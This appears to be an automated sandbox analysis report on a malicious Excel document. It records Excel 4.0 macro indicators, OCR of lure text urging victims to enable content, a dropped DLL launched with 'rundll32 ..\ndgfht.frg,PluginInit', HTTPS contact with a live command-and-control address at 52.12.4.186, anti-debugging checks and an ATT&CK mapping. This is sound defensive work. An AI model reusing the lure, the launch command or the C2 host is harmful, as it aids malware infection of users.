      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
      Source: rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: rundll32.exe, 00000004.00000003.2166659967.00000000002DA000.00000004.00000001.sdmpString found in binary or memory: https://52.12.4.186/5B
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/h
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update6
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateA
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateF
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownHTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
      Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmpBinary or memory string: DirectDrawCreateEx
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: GetRawInputData
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1108, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
      Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start . the decryption of the docum
      Source: Screenshot number: 8Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
      Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
      Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
      Source: Document image extraction number: 3Screenshot OCR: Enable Content
      Source: Document image extraction number: 4Screenshot OCR: Enable Editing
      Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
      Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
      Source: Screenshot number: 12Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Documents_460000622_1464906353.xlsInitial sample: EXEC
      Source: Documents_460000622_1464906353.xlsInitial sample: CALL
      Office process drops PE fileShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E777A4B NtQueryInformationProcess,4_2_6E777A4B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E783C314_2_6E783C31
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7A9E504_2_6E7A9E50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5FFD4_2_6E7E5FFD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F3FDF4_2_6E7F3FDF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F0C104_2_6E7F0C10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5DC34_2_6E7E5DC3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7A8A704_2_6E7A8A70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E5B944_2_6E7E5B94
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E595A4_2_6E7E595A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D665D4_2_6E7D665D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F07604_2_6E7F0760
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79A7304_2_6E79A730
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E572B4_2_6E7E572B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E67234_2_6E7E6723
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E64C64_2_6E7E64C6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7ED5DE4_2_6E7ED5DE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E625A4_2_6E7E625A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79C2D04_2_6E79C2D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7FB3604_2_6E7FB360
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D83F04_2_6E7D83F0
      Source: Documents_460000622_1464906353.xlsOLE indicator, VBA macros: true
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7794D0 appears 34 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7D4553 appears 73 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7D4E40 appears 54 times
      Source: Documents_460000622_1464906353.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
      Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@1/2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E777B4D CoCreateInstance,4_2_6E777B4D
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{ce7c126a-cd42-45d2-8a55-1f743478800b}
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{395c2195-6d12-42eb-b952-6aae2e230819}
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7B8.tmpJump to behavior
      Source: Documents_460000622_1464906353.xlsOLE indicator, Workbook stream: true
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInitJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInitJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
      Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
      Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
      Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
      Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E784371 push ecx; ret 4_2_6E784384
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E792E8F push ss; retf 4_2_6E792EAB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4E86 push ecx; ret 4_2_6E7D4E99
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7926ED push esp; retf 4_2_6E7926FA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D451C push ecx; ret 4_2_6E7D452F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79521B push esp; ret 4_2_6E79521C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E791047 push esp; retf 4_2_6E79108E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E794020 push cs; ret 4_2_6E794041
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ndgfht.frgJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmpBinary or memory string: CDB.EXEWINDBG.EXE
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F61E FindFirstFileExW,4_2_6E77F61E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802EC8 FindFirstFileExA,4_2_6E802EC8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803336 FindFirstFileExA,4_2_6E803336
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E803361 FindFirstFileExW,4_2_6E803361
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E77D332
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77F248 mov eax, dword ptr fs:[00000030h]4_2_6E77F248
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77C61C mov eax, dword ptr fs:[00000030h]4_2_6E77C61C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7F4D21 mov eax, dword ptr fs:[00000030h]4_2_6E7F4D21
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77865C GetProcessHeap,InternetQueryDataAvailable,4_2_6E77865C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E77D332
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E778FBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E778FBE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7791BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E7791BB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4A3C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E7D4A3C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7D4728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E7D4728
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7E9302 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E7E9302

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.12.4.186 187Jump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInitJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
      Source: Yara matchFile source: Documents_460000622_1464906353.xls, type: SAMPLE
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: FoldersAppPropertiesPROGMAN
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: GetProgmanWindow
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: ProgmanProgman3
      Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmpBinary or memory string: IMECreateGroupShowGroupAddItemExitProgmanDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileDDEClientddeClassccInsDDEBWWFrameDDEClientWndClassBACKSCAPE#32770SenderCA_DDECLASSInstallMake Program Manager GroupViewFolderExploreFolder
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: SetProgmanWindow
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E7792E1 cpuid 4_2_6E7792E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6E806E8D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E7FBF12
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E7FBFFF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6E806CB9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E806DC0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E806B90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E8068B3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E806818
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E7FC8E3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E7C190C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E8067AF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoEx,4_2_6E7D3576
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6E806537
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E779516 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_6E779516
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E802845 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_6E802845
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting11Path InterceptionProcess Injection112Masquerading121Input Capture21System Time Discovery2Remote ServicesInput Capture21Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerSecurity Software Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

